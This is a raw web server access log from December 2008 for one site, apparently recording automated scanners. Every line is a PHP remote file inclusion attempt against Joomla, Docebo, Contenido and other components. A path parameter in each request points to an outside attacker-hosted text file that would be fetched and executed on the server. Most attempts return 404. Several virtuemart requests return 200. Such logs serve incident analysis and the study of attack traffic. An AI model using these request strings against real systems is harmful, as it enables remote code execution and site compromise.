82.78.216.197 - - [08/Dec/2008:08:58:00 -0800] "GET /logs/access_081114.log//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:08:58:00 -0800] "GET /includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:08:58:01 -0800] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:08:58:14 -0800] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:08:58:14 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:08:58:14 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:08:58:16 -0800] "GET /logs/access_080404.log//?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.66.105 - - [08/Dec/2008:08:58:26 -0800] "GET /logs/access_081118.log//vwar/backup/errors.php?error=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:08:58:27 -0800] "GET /logs/access_080404.log//?page=http://www.geocities.com/kerehore93/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.66.105 - - [08/Dec/2008:08:58:31 -0800] "GET /logs/access_081114.log//vwar/backup/errors.php?error=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:58:34 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:58:34 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:58:34 -0800] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:58:43 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:58:44 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:58:44 -0800] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:58:44 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:08:58:51 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:03 -0800] "GET /logs/access_080530.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:14 -0800] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:14 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:14 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:08:59:19 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:08:59:19 -0800] "GET /phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:08:59:20 -0800] "GET /logs/phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:21 -0800] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:21 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:08:59:21 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:26 -0800] "GET /logs//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:26 -0800] "GET /phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:27 -0800] "GET /logs/access_080710.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:27 -0800] "GET /logs//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:27 -0800] "GET /logs/access_080710.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:27 -0800] "GET /phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:59:44 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:08:59:44 -0800] "GET /logs/access_081120.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:49 -0800] "GET /logs/access_080701.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:08:59:51 -0800] "GET /logs/access_080701.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:08:59:53 -0800] "GET /logs/access_080530.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:00:06 -0800] "GET /logs/access_080613.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:00:06 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:00:07 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:00:07 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:00:07 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:00:07 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 200 95597 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:00:19 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:00:30 -0800] "GET /logs/access_080809.log//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:00:31 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:00:31 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:00:34 -0800] "GET /logs/access_080714.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:00:34 -0800] "GET /logs/access_080710.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:00:35 -0800] "GET /logs/access_080714.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:00:40 -0800] "GET /logs/access_080710.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:01:01 -0800] "GET /logs/access_080530.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:01:09 -0800] "GET /logs/access_080701.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:01:09 -0800] "GET /logs/access_080701.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:01:13 -0800] "GET /logs/access_080530.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:13 -0800] "GET /logs/access_080613.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:13 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:14 -0800] "GET /logs/access_080613.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:14 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:14 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 200 95629 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:15 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 200 95629 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:09:01:24 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:27 -0800] "GET /logs/access_080421.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:01:38 -0800] "GET /logs/access_081113.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:01:38 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:01:38 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [08/Dec/2008:09:01:39 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ronniann.com//assets/galleries/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [08/Dec/2008:09:01:39 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ronniann.com//assets/galleries/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [08/Dec/2008:09:01:39 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ronniann.com//assets/galleries/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:45 -0800] "GET /logs/access_080613.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:45 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:45 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 200 95613 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:01:46 -0800] "GET /logs/access_081114.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.28 - - [08/Dec/2008:09:01:53 -0800] "GET /logs/access_080228.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://geocities.com/brojollele/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:01:55 -0800] "GET /logs/access_080819.log//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:57 -0800] "GET /logs/access_080421.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:01:59 -0800] "GET /logs/access_080421.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /logs//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /logs/access_080710.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /logs//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:03 -0800] "GET /logs/access_080710.log%20%20//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:25 -0800] "GET /logs/access_080710.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [08/Dec/2008:09:02:27 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ronniann.com//assets/galleries/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:02:27 -0800] "GET /logs/access_080710.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:02:34 -0800] "GET /logs/access_080421.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.146.59.116 - - [08/Dec/2008:09:02:38 -0800] "GET /logs/access_080928.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mysticshop.ru/robots.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
82.146.59.116 - - [08/Dec/2008:09:02:38 -0800] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://mysticshop.ru/robots.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:02:49 -0800] "GET /logs/access_080415.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:02:49 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:02:50 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:02:51 -0800] "GET /logs/access_071230.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:03:19 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.203.95.172 - - [08/Dec/2008:09:03:27 -0800] "GET /logs/access_081114.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.95.172 - - [08/Dec/2008:09:03:27 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.95.172 - - [08/Dec/2008:09:03:28 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bestmp3.ws/extras/php.ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:04:04 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:04:04 -0800] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:04:04 -0800] "GET /logs/access_080713.log//contenido/external/frontend/news.php?cfg[path][includes]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:04:28 -0800] "GET /logs/access_080701.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:04:39 -0800] "GET /logs/access_080701.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
